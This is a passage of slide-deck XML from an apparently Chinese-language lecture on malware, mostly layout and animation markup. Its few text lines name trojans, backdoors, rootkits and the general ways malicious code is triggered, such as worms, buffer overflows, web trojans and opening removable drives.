            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>多用于木马，后门，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285710" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{510675F4-CDB9-481E-A86F-9A3D4C660721}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="3500438"/>
            <a:ext cx="1079500" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 46832"/>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5663" name="Line 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84A023C8-2F66-435C-884E-200E7491A236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="0"/>
            <a:ext cx="0" cy="1916113"/>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hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="6" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285706"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285706"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285706"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285706"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 2.77778E-7 1.50289E-6 C -0.0092 0.00485 -0.00208 0.00717 -0.01094 0.01272 C -0.02188 0.02682 -0.03264 0.04069 -0.04358 0.05364 C -0.05122 0.06243 -0.05243 0.06821 -0.06076 0.07167 C -0.06667 0.08578 -0.07535 0.09295 -0.08264 0.10497 C -0.08854 0.11468 -0.0934 0.12902 -0.09965 0.13826 C -0.10486 0.14613 -0.11198 0.15052 -0.11684 0.15861 C -0.12517 0.17248 -0.11719 0.16647 -0.12622 0.17133 C -0.13872 0.18774 -0.15052 0.20832 -0.16493 0.22011 C -0.17552 0.243 -0.16354 0.2215 -0.17587 0.23306 C -0.1842 0.24046 -0.18837 0.25595 -0.19757 0.26104 C -0.20278 0.26659 -0.2059 0.27329 -0.21163 0.2763 C -0.2158 0.2948 -0.2184 0.29017 -0.22569 0.3022 C -0.22969 0.32185 -0.22378 0.29803 -0.23194 0.31468 C -0.23594 0.32347 -0.23646 0.34381 -0.24115 0.35584 C -0.24375 0.38682 -0.2441 0.39121 -0.2441 0.43029 " pathEditMode="relative" rAng="0" ptsTypes="fffffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285706"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-12200" y="21500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="285710"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285710"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285710"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285710"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">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85709">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28570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85709">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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85709">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">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85709">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">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285709">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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285709">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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285709">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>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285709">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="285709">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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285709">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28570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06" grpId="0" animBg="1"/>
      <p:bldP spid="285706" grpId="1" animBg="1"/>
      <p:bldP spid="285709" grpId="0" build="allAtOnce" animBg="1"/>
      <p:bldP spid="2857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674" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1378046A-C601-4C6F-9A0D-29D452FFA6BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="612775" y="117475"/>
            <a:ext cx="863600" cy="1439863"/>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寻找目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156675" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F58AF9DD-0ED5-46A7-9ADE-0621AB90BE6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284480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156676" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9778F009-2128-40CE-B15C-5C22C9DD8DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536575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6677" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27060957-3E53-4A2E-98D5-DF66236E8DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7453313"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="156678" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835F0F05-0B1D-4F5B-A431-A469ADADE3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="156674" idx="3"/>
            <a:endCxn id="156675" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1476375" y="836613"/>
            <a:ext cx="1368425" cy="1587"/>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6679" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0238B12-3751-4C80-80B9-E313169EFFB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="156675" idx="3"/>
            <a:endCxn id="156676" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="836613"/>
            <a:ext cx="1657350"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6680" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BD137D-60B7-410D-87DA-A8509ABCBB6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="156676" idx="3"/>
            <a:endCxn id="156677" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6229350" y="836613"/>
            <a:ext cx="1223963"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sp>
        <p:nvSpPr>
          <p:cNvPr id="156681" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACF29D0-018A-43B7-8578-47525E1ED9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="-100013"/>
            <a:ext cx="0" cy="2016126"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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6730" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A7466FC-A533-4237-BB07-A14629C982D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536416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6683" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C482E62A-9A7A-47E1-8DC8-2B3B99063EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="745331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sp>
        <p:nvSpPr>
          <p:cNvPr id="286732" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55C7870-3BDE-45BC-8D7A-496F21721BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3006725" y="1614488"/>
            <a:ext cx="5648325" cy="4751387"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll">
            <a:avLst>
              <a:gd name="adj" fmla="val 8620"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主动触发</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蠕虫</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>各种漏洞（如缓冲区溢出）</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恶意网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网页木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>被动触发</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初次人为触发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>双击执行，或命令行运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>打开可移动存储设备</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>打开本地磁盘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
